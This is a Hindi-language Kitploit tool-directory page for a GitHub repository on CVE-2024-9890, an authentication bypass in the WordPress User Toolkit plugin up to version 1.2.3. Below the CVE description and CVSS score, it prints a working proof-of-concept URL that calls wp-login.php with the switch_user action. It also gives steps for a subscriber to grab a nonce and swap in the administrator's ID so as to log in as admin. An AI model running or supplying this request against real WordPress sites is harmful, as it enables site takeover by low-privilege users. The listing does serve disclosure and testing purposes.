Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9890 — User Toolkit <= 1.2.3 - प्रमाणित (सब्सक्राइबर+) प्रमाणीकरण बाइपास | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-9890
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-9890

CVE-2024-9890

User Toolkit <= 1.2.3 - प्रमाणित (सब्सक्राइबर+) प्रमाणीकरण बाइपास

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9890

User Toolkit <= 1.2.3 - प्रमाणित (सब्सक्राइबर+) प्रमाणीकरण बायपास

विवरण:

वर्डप्रेस के लिए User Toolkit प्लगइन संस्करण 1.2.3 तक (शामिल) में प्रमाणीकरण बायपास की कमजोरी है। यह 'switchUser' फ़ंक्शन में अनुचित क्षमता जांच के कारण होता है। इससे प्रमाणित हमलावर, जिनके पास सब्सक्राइबर-स्तर की अनुमतियाँ और उससे ऊपर की अनुमतियाँ हैं, साइट पर किसी भी मौजूदा उपयोगकर्ता (जैसे व्यवस्थापक) के रूप में लॉग इन कर सकते हैं।

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit

POC

root@kitploit:~
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329

अपने उपयोगकर्ता के रूप में लॉग इन करें। अपने प्रोफ़ाइल पृष्ठ का view-source करें और nonce मान प्राप्त करें। user_from मान को अपने उपयोगकर्ता आईडी में बदलें user_id को व्यवस्थापक के आईडी में बदलें हो गया!

टूल डाउनलोड करें